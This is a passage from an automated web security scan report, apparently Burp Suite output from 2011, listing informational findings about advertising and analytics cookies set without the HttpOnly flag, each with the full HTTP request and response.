GET /dcsdlg96i00000clc5ljt8xox_8x1x/dcs.gif?&WT.co_f=50.23.123.106-1472814720.30179680&WT.vt_sid=50.23.123.106-1472814720.30179680.1317600406325&WT.Site=www.orbitz.com&WT.tz=-5&WT.bh=19&WT.ul=en-US&WT.cd=16&WT.sr=1920x1200&WT.jo=Yes&WT.ti=hotel200&WT.js=Yes&WT.jv=1.5&WT.bs=700x700&WT.fi=Yes&WT.fv=10.3&WT.dl=20&WT.si_p=SR&WT.si_n=HOT&WT.tx_e=s&WT.pn_sku=HOT&WT.mc_id=C11287x600&WT.si_x=10&WT.wtsv=1&WT.vt_f_tlh=1317600638&hostname=www.orbitz.com&pos=ORB&b=A&wtEvtSrc=hotel200&owwPage=/shop/hotelsearch&LNG=en_US&avid=10644782471317600406435&zip=NA&HImp=10417,1,429.00,NA,NA;319853,2,308.65,TLICRN,NA;230082,3,383.33,STDAY9,NA;10442,4,339.15,TJDHS9,NA;44756,5,339.00,NA,NA;29958,6,345.67,NA,NA;287572,7,700.00,NA,NA;29957,8,399.00,NA,NA;29959,9,445.67,NA,NA;44414,10,63.20,BBYD4L,NA;80231,11,181.67,NA,NA;283875,12,375.67,NA,NA;58796,13,401.49,NA,NA;27748,14,359.14,NA,NA;24646,15,349.00,NA,NA;248217,16,58.50,JK29EZ,NA;83678,17,242.33,NA,NA;27609,18,139.99,NA,NA;21445,19,119.00,NA,NA;5022,20,99.99,NA,NA;5408,21,314.11,MAUQSF,NA;69512,22,365.67,NA,NA;267914,23,72.10,8964YV,NA;292301,24,445.67,NA,NA;12248,25,409.01,NA,NA&rs=drf-global.com&odp=NA_BOS&kwd=Boston,United%20States&sts=POI&d=BOS&promoId=319853,TLICRN,NA;230082,STDAY9,NA;10442,TJDHS9,NA;44414,BBYD4L,NA;248217,JK29EZ,NA;5408,MAUQSF,NA;267914,8964YV,NA&hrg=1&srct=1&dd=10/04/2011&wsid=71A4AF1632EAB3B1F4E0C49149EEC65B&ttu=[1]&rqid=wl000000000000005fc36671000a2f42&lpid=plhot&ud=11231&pa=NA&strf=1&cl=NA&srpv=1&rd=10/07/2011&ng=3&sop=NA&rm=1&tx=A1&spT=ASP,0,&ord=BV&tt=[A]&dro=1&pJS=9036&pHT=56127&pDM=56134&pAgSt=20880&pAgFn=66517&pOL=82128&pUA=Mozilla/5.0%20(Windows%20NT%206.1;%20WOW64)%20AppleWebKit/535.1%20(KHTML,%20like%20Gecko)%20Chrome/14.0.835.187%20Safari/535.1&pJSP=409&dcsdat=1317600638767&dcssip=www.orbitz.com&dcsuri=/shop/hotelsearch&dcsqry=%3Ftype=hotel%26hotel.keyword.key=Boston%2CUnited%20States%26hotel.rooms[0].adlts=1%26hotel.type=keyword%26hotel.chkin=10/04/11%26hotel.chkout=10/07/11%26search=Search%26WT.mc_ev=click%26WT.mc_id=o_igo_merch_city_dated%26gcid=C11287x600-CYBoston,United%20States%26lpid=plhot&dcsref=http://drf-global.com/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf%3Flob=HOTEL%26advertiserName=orbitz%26grp=9705%26placeholderUrl=http%3A%2F%2Fwww.travelocity.com%2Fvstrack%3FWA1%3D03020%26WA3%3D742%26WA5%3DDRFContinue%26WA6%3Dair%26dst%3Durl_placeholder%26url=http%3A%2F%2Fad.doubleclick.net%2Fclk%3B141652382%3B20702477%3Ba%3Fhttp%3A%2F%2Fwww.orbitz.com%2Fpsi%3Ftype%3Dhotel%26market%3D%24%7Bcity%7D%2C%24%7Bcountryn%7D%26checkin%3D%24%7BdepartureDate%3Ad%3A%22yyyy-mm-dd%22%7D%26checkout%3D%24%7BreturnDate%3Ad%3A%22yyyy-mm-dd%22%7D%26guests%3D%24%7Badults%7D%26rooms%3D%24%7Brooms%7D%26WT.mc_id%3Do_igo_merch_city_dated%26WT.mc_ev%3Dclick%26gcid%3DC11287x600-CY%24%7Bcity%7D%2C%24%7Bcountryn%7D%26pid=c3919e40-e5b8-49f8-b876-4fed1f31968f%26sid=bfa7dd53-c988-458c-86df-52443affccb8%26uid=20d9c1fc-61a4-45f0-9524-380e68994c01%26widget=H_PopUnder%26pti=default%26src=none%26ppi=4a15630f-e16d-42c4-95d2-0852b73fdd75%26ctx=92aa9504-b6eb-4091-8b93-6582f63d9555%26ccn=1%26cgn=153%26pos=0%26aii=e3898191-1452-431e-82b6-c9f881ca9a4c%26%24cc=US%26%24rc=US%26%24adults=1%26%24destination=Boston%2C%20MA%20Massachusetts%26%24glsId=440663%26%24city=Boston%26%24countryn=United%20States%26%24countryc=US%26%24staten=Massachusetts%26%24statec=MA%26%24lob=HOTEL%26%24rooms=1%26%24context=92aa9504-b6eb-4091-8b93-6582f63d9555%26%24widget=H_PopUnder%26%24l=9%26%24departureDate=2011-10-04%26%24returnDate=2011-10-07%26%24aucnt=0%26%24pid=c3919e40-e5b8-49f8-b876-4fed1f31968f%26%24sid=bfa7dd53-c988-458c-86df-52443affccb8%26adunit=d5332d31-d5c8-59f8-c876-4fee1f31712a%26 HTTP/1.1
Host: ctix8.cheaptickets.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.orbitz.com/shop/hotelsearch?type=hotel&hotel.keyword.key=Boston%2CUnited%20States&hotel.rooms[0].adlts=1&hotel.type=keyword&hotel.chkin=10/04/11&hotel.chkout=10/07/11&search=Search&WT.mc_ev=click&WT.mc_id=o_igo_merch_city_dated&gcid=C11287x600-CYBoston,United%20States&lpid=plhot
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ACOOKIE=C8ctADUwLjIzLjEyMy4xMDYtMTQ3MjgxNDcyMC4zMDE3OTY4MAAAAAAAAAABAAAAPXQAAJr8iE6Z/IhOAQAAABQuAACa/IhOmfyITgAAAAA-

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 03 Oct 2011 00:11:46 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: ACOOKIE=C8ctADUwLjIzLjEyMy4xMDYtMTQ3MjgxNDcyMC4zMDE3OTY4MAAAAAAAAAACAAAAPXQAAML9iE6Z/IhO/ucAAML9iE6D/YhOAQAAABQuAADC/YhOmfyITgAAAAA-; path=/; expires=Thu, 30-Sep-2021 00:11:46 GMT
P3P: CP="NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"
Pragma: no-cache
Expires: -1
Cache-Control: no-cache
Content-type: image/gif
Content-Length: 67

GIF89a...................!..ADOBE:IR1.0....!.......,...........T..;
14.129. http://ctix8.cheaptickets.com/dcstaccdt4h7cnabui8c1i31a_8m2q/dcs.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ctix8.cheaptickets.com
Path:   /dcstaccdt4h7cnabui8c1i31a_8m2q/dcs.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /dcstaccdt4h7cnabui8c1i31a_8m2q/dcs.gif?&WT.Site=www.cheaptickets.com&WT.tz=-5&WT.bh=19&WT.ul=en-US&WT.cd=16&WT.sr=1920x1200&WT.jo=Yes&WT.ti=hotel200&WT.js=Yes&WT.jv=1.5&WT.bs=1074x906&WT.fi=Yes&WT.fv=10.3&WT.dl=0&WT.si_p=SR&WT.si_n=HOT&WT.tx_e=s&WT.pn_sku=HOT&WT.mc_id=C16036x354&WT.si_x=10&WT.wtsv=1&WT.co_f=50.23.123.106-1472814720.30179680&WT.vt_f=1&WT.vt_f_s=1&WT.vt_f_d=1&WT.vt_f_tlv=0&WT.vt_f_tlh=0&WT.vt_sid=50.23.123.106-1472814720.30179680.1317602302061&hostname=www.cheaptickets.com&owwPage=/shop/hotelsearch&LNG=en_US&avid=7567558764917771317602252&zip=NA&HImp=317971,1,129.00,NA,NA;319853,2,373.06,TLICRN,NA;50080,3,70.28,V1P3RZ,NA;21445,4,139.00,NA,NA;83803,5,96.86,NA,NA;32679,6,175.00,NA,NA;2042,7,143.10,NA,NA;7222,8,197.10,NA,NA;65358,9,99.99,NA,NA;126192,10,90.74,NA,NA;16123,11,118.16,NA,NA;28337,12,61.70,NA,NA;46267,13,134.99,NA,NA;48073,14,107.14,NA,NA;130650,15,189.00,NA,NA;42996,16,102.85,NA,NA;9964,17,124.99,NA,NA;229656,18,456.43,NA,NA;104806,19,149.00,NA,NA;11852,20,117.71,NA,NA;114000,21,149.00,NA,NA;235019,22,421.86,NA,NA;35100,23,417.14,NA,NA;206519,24,129.00,NA,NA;209228,25,200.00,NA,NA&rs=www.trip.com&odp=NA_BOS&kwd=bos&sts=AIR&b=B&d=BOS&promoId=319853,TLICRN,NA;50080,V1P3RZ,NA&hrg=1&srct=1&dd=10/09/2011&wsid=E880BFD3C49D42E3&ttu=[1]&rqid=wl00000000000000ba0b0698000a5f08&lpid=plhot&pos=CTIX&ud=36053&pa=NA&strf=1&cl=NA&srpv=1&trf=1&rd=10/16/2011&ng=7&sop=NA&rm=1&tx=A1&spT=ASP,0,&ord=BV&tt=[A]&dro=1&wtEvtSrc=hotel200&dcsdat=1317602302059&dcssip=www.cheaptickets.com&dcsuri=/shop/hotelsearch&dcsqry=%3Ftype=hotel%26hotel.keyword.key=bos%26hotel.rooms[0].adlts=1%26hotel.type=keyword%26hotel.chkin=10/09/11%26hotel.chkout=10/16/11%26search=Search%26DCSext.mc_kw=%26WT.mc_ev=click%26WT.mc_id=c_trip_hot%26gcid=C16036x354%26lpid=plhot&dcsref=http://www.trip.com/hotels.html HTTP/1.1
Host: ctix8.cheaptickets.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.cheaptickets.com/shop/hotelsearch?type=hotel&hotel.keyword.key=bos&hotel.rooms[0].adlts=1&hotel.type=keyword&hotel.chkin=10/09/11&hotel.chkout=10/16/11&search=Search&DCSext.mc_kw=&WT.mc_ev=click&WT.mc_id=c_trip_hot&gcid=C16036x354&lpid=plhot
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ACOOKIE=C8ctADUwLjIzLjEyMy4xMDYtMTQ3MjgxNDcyMC4zMDE3OTY4MAAAAAAAAAACAAAAPXQAAKwDiU6Z/IhO/ucAAIX9iE6D/YhOAQAAABQuAACsA4lOmfyITgAAAAA-; logging=E880BFD3C49D42E3||egapp2218p.prod.orbitz.net; MKTG=ABCDEFGHU0VNfEMxNjAzNngzNTR8IHwxMzE3NjAyMjUzMjI3fEMxNjAzNngzNTR8fDEwLzAyLzIwMTEgMTk6Mzc6MzMgUE18IHwg; mbox=check#true#1317602329|session#1317602268649-666039#1317604129; WT_FPC=id=50.23.123.106-1472814720.30179680:lv=1317598702061:ss=1317598702061

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 03 Oct 2011 00:40:11 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: ACOOKIE=C8ctADUwLjIzLjEyMy4xMDYtMTQ3MjgxNDcyMC4zMDE3OTY4MAAAAAAAAAADAAAAPXQAAAQEiU6Z/IhO/ucAAAUEiU6D/YhO+XEAAGsEiU4ABIlOAQAAABQuAABrBIlOmfyITgAAAAA-; path=/; expires=Thu, 30-Sep-2021 00:40:11 GMT
P3P: CP="NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"
Pragma: no-cache
Expires: -1
Cache-Control: no-cache
Content-type: image/gif
Content-Length: 67

GIF89a...................!..ADOBE:IR1.0....!.......,...........T..;
14.130. http://d.agkn.com/iframe!t=1168!  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d.agkn.com
Path:   /iframe!t=1168!

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /iframe!t=1168!?che=823146&e=x&ent=5797640,69802575,246279115,44069375 HTTP/1.1
Host: d.agkn.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://dm.travelocity.com/html.ng/adsize=160x600&site=travelocity&cobrand=TRAVELOCITY&locale=en&pagepos=2&area=hotel&dest=BOS&paxa=0&paxs=0&paxc=0&random=529176&tile=711446054649628&section=results
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uuid=OPTOUT

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: uuid=OPTOUT; Version=1; Domain=.agkn.com; Max-Age=157680000; Expires=Sat, 01-Oct-2016 00:09:56 GMT; Path=/
P3P: CP="NOI DSP COR CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Cache-Control: max-age=0, must-revalidate
Pragma: no-cache
Expires: Thu, 1 Jan 1970 00:00:00 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Content-Length: 239
Date: Mon, 03 Oct 2011 00:09:56 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">


<html>
<head>
<meta http-equiv="pragma" content="no-cache">

</head>

<body style="border: 0; margin:
...[SNIP]...
14.131. http://d.audienceiq.com/r/dd/id/L21rdC83My9jaWQvMjY0MTUwMy90LzAvY2F0LzM3MTExNzI  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d.audienceiq.com
Path:   /r/dd/id/L21rdC83My9jaWQvMjY0MTUwMy90LzAvY2F0LzM3MTExNzI

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /r/dd/id/L21rdC83My9jaWQvMjY0MTUwMy90LzAvY2F0LzM3MTExNzI HTTP/1.1
Host: d.audienceiq.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://dm.travelocity.com/html.ng/adsize=728x90&site=travelocity&cobrand=TRAVELOCITY&locale=en&area=hotel&dest=BOS&paxa=0&paxs=0&paxc=0&adloc=NA&random=529164&tile=711446054649628&section=results
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=2966958661410417168

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Set-Cookie: uid=2966958661410417168; Domain=.audienceiq.com; Expires=Sat, 31-Mar-2012 00:09:11 GMT; Path=/
Content-Type: text/javascript
Content-Length: 0
Date: Mon, 03 Oct 2011 00:09:11 GMT

14.132. http://d.audienceiq.com/r/dm/mkt/44/mpid//mpuid/2944787775510337379/mchpid/3/url/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d.audienceiq.com
Path:   /r/dm/mkt/44/mpid//mpuid/2944787775510337379/mchpid/3/url/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /r/dm/mkt/44/mpid//mpuid/2944787775510337379/mchpid/3/url/ HTTP/1.1
Host: d.audienceiq.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://ads.pubmatic.com/AdServer/js/syncuppixels.html?p=26620&s=26621
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=2966958661410417168

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Set-Cookie: uid=2966958661410417168; Domain=.audienceiq.com; Expires=Sat, 31-Mar-2012 01:52:56 GMT; Path=/
Content-Type: image/gif
Content-Length: 43
Date: Mon, 03 Oct 2011 01:52:55 GMT

GIF89a.............!.......,...........D..;
14.133. http://d.p-td.com/r/dm/mkt/4/mpid//mpuid/2944787775510337379/mchpid/9/url/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d.p-td.com
Path:   /r/dm/mkt/4/mpid//mpuid/2944787775510337379/mchpid/9/url/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /r/dm/mkt/4/mpid//mpuid/2944787775510337379/mchpid/9/url/ HTTP/1.1
Host: d.p-td.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.premierleague.com/page/Headlines/0,,12306~2469333,00.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=4018048898892878422

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Set-Cookie: uid=4018048898892878422; Domain=.p-td.com; Expires=Fri, 30-Mar-2012 23:49:15 GMT; Path=/
Content-Type: image/gif
Content-Length: 43
Date: Sun, 02 Oct 2011 23:49:14 GMT

GIF89a.............!.......,...........D..;
14.134. http://d.tradex.openx.com/afr.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d.tradex.openx.com
Path:   /afr.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /afr.php?zoneid=6391&cb=INSERT_RANDOM_NUMBER_HERE HTTP/1.1
Host: d.tradex.openx.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.goal.com/en/teams/england/97/man-utd-news
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OXRB=28_4196; OAID=6f699005174db05207a17138d8473dc0

Response

HTTP/1.1 200 OK
Date: Sun, 02 Oct 2011 23:50:29 GMT
Server: Apache
X-Powered-By: PHP/5.2.11
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: CP="CUR ADM OUR NOR STA NID"
Set-Cookie: OAID=6f699005174db05207a17138d8473dc0; expires=Mon, 01-Oct-2012 23:50:29 GMT; path=/
Content-Length: 2921
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC '-//W3C//DTD XHTML 1.0 Transitional//EN' 'http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd'>
<html xmlns='http://www.w3.org/1999/xhtml' xml:lang='en' lang='en'>
<head>
<ti
...[SNIP]...
14.135. http://d.tradex.openx.com/lg.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d.tradex.openx.com
Path:   /lg.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /lg.php?bannerid=1929&campaignid=632&zoneid=6511&cb=010de37691&r_id=c16f6660367c98569a9b97a0130e4390&r_ts=lsgq82 HTTP/1.1
Host: d.tradex.openx.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://d.tradex.openx.com/afr.php?refresh=40&zoneid=6511&cb=INSERT_RANDOM_NUMBER_HERE
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OXRB=28_4196; OAID=6f699005174db05207a17138d8473dc0

Response

HTTP/1.1 200 OK
Date: Sun, 02 Oct 2011 23:50:27 GMT
Server: Apache
X-Powered-By: PHP/5.2.11
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: CP="CUR ADM OUR NOR STA NID"
Set-Cookie: OAID=6f699005174db05207a17138d8473dc0; expires=Mon, 01-Oct-2012 23:50:27 GMT; path=/
Content-Length: 43
Connection: close
Content-Type: image/gif

GIF89a.............!.......,...........D..;
14.136. http://d.xp1.ru4.com/meta  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d.xp1.ru4.com
Path:   /meta

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /meta?_o=179638&_t=cmcont&ssv_ptnr=pm HTTP/1.1
Host: d.xp1.ru4.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://ads.pubmatic.com/AdServer/js/syncuppixels.html?p=26071&s=26072
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X1ID=OO-00000000000000000; 31041217-B31041253=2|31041263|0|0|0|31041234|31041231|-1; 66281-B66290=3|0|0|0|0|66286|110253|-1

Response

HTTP/1.1 200 OK
Server: Sun-Java-System-Web-Server/7.0
Date: Mon, 03 Oct 2011 00:12:54 GMT
P3p: policyref="/w3c/p3p.xml", CP="NON DSP COR PSAa OUR STP UNI"
Expires: Mon, 01-Jan-2010 12:00:00 GMT
Pragma: no-cache
Set-cookie: 1780853-B1781017=3|1781033|0|0|0|1781015|22810441|-1; domain=.ru4.com; path=/
Content-type: text/html
Content-length: 1295
X-Cnection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html><head><title></title></head><body style="background-color: transparent">
<script type="text
...[SNIP]...
14.137. http://d7.zedo.com/img/bh.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /img/bh.gif

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /img/bh.gif?n=826&g=20&a=0&s=1&l=1&t=e&f=1&e=1 HTTP/1.1
Host: d7.zedo.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://ads.pubmatic.com/HostedThirdPartyPixels/TF/ae_12232010.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDA=k5xiThcyanucBq9IXvhSGSz5~090311; FFMChanCap=2457780B305,825#722607,7038#1013066#971199:767,4#789954:951,2#887163|0,1#0,24:0,10#0,24:0,10#0,24:0,1#0,24:0,15#0,24; ZFFAbh=977B826,20|121_977#365; ZFFBbh=990B826,20|121_977#0; FFMCap=2470080B826,110235,110236:933,196008:951,125046|0,1#0,24:0,5#0,24:0,6#0,24:0,6#0,24; PI=h484782Za669089Zc826000187,826000187Zs173Zt1260Zm68Zb43199; FFgeo=5386156; ZEDOIDX=29; FFAbh=977B809,20|40_1#391:305,20|149_1#365:162,20|636_1#381; FFBbh=1003B809,20|40_1#10:162,20|636_1#16:305,20|149_1#0

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Length: 47
Content-Type: image/gif
Set-Cookie: ZFFAbh=977B826,20|121_977#365;expires=Sun, 01 Jan 2012 00:15:53 GMT;domain=.zedo.com;path=/;
Set-Cookie: ZFFBbh=1006B826,20|121_977#0;expires=Tue, 02 Oct 2012 00:15:53 GMT;domain=.zedo.com;path=/;
ETag: "3a9d027-de66-4add1b75df1c0"
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=9372
Expires: Mon, 03 Oct 2011 02:52:05 GMT
Date: Mon, 03 Oct 2011 00:15:53 GMT
Connection: close

GIF89a.............!.......,...........D..;


14.138. http://data.cmcore.com/imp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://data.cmcore.com
Path:   /imp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /imp?tid=17&ci=90010394&vn1=4.1.1&vn2=e4.0&ec=UTF-8&cm_mmc=Cons-CC-_-20112H-_-AllCRConcept-_-AllCreativeSize&cvdone=s HTTP/1.1
Host: data.cmcore.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://dm.travelocity.com/html.ng/adsize=160x600&site=travelocity&cobrand=TRAVELOCITY&locale=en&pagepos=2&area=hotel&dest=BOS&paxa=0&paxs=0&paxc=0&random=529176&tile=711446054649628&section=results
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CoreID6=50021315153052143970353; TestSess3=x

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:09:54 GMT
Server: Apache
P3P: CP="NON DSP COR CUR ADMo DEVo PSAo PSDo OUR IND ONL UNI PUR COM NAV INT DEM STA"
Set-Cookie: 90010394_reset=1317600594;path=/
Expires: Sun, 02 Oct 2011 06:09:54 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, pre-check=0, post-check=0, private
Pragma: no-cache
Content-Type: image/gif
Content-Length: 43

GIF89a.............!.......,........@..D..;
14.139. http://delivery.hotels.com/Hotels/Delivery.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://delivery.hotels.com
Path:   /Hotels/Delivery.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Hotels/Delivery.aspx?LAN=en_US&P=HOTELS_RESULTS&D=BOS&CI=10%2f04%2f2011&CO=10%2f07%2f2011&pr=1&pa0=2&CUR=USD&RID=F26233EF-31CE-4292-B85B-D59136E17861&HsrchId=8a1f660d-3224-44b2-81e5-6c5cf059520f&ads=3&HTID1=279478&HP1=289.00&HTID2=507871&HP2=385.67%7c308.53&HTID3=382704&HP3=432.33&HTID4=278318&HP4=425.67%7c383.10&HTID5=282295&HP5=429.00&HTID6=280489&HP6=409.40&HTID7=280555&HP7=412.33&HTID8=281066&HP8=401.33&HTID9=286928&HP9=399.00&HTID10=286520&HP10=379.95&HTID11=279419&HP11=349.00&HTID12=278651&HP12=345.67&HTID13=341115&HP13=399.00%7c359.10&HTID14=293264&HP14=414.00&HTID15=290317&HP15=399.00%7c339.15&HTID16=294968&HP16=419.00&HTID17=282971&HP17=127.99&HTID18=278530&HP18=359.00&HTID19=278584&HP19=445.67&HTID20=469918&HP20=445.67&HTID21=296221&HP21=399.00&HTID22=287041&HP22=436.33&HTID23=387950&HP23=392.33&HTID24=289629&HP24=221.10&HTID25=279089&HP25=263.33&HTID26=284205&HP26=335.67&HTID27=279064&HP27=295.67&HTID28=293346&HP28=309.00&HTID29=534622&HP29=875.00&HTID30=286858&HP30=439.00&HTID31=392615&HP31=124.99&HTID32=290613&HP32=143.99&HTID33=327172&HP33=103.00%7c72.10&HTID34=279428&HP34=149.22%7c141.76&HTID35=278489&HP35=223.74%7c178.99&HTID36=2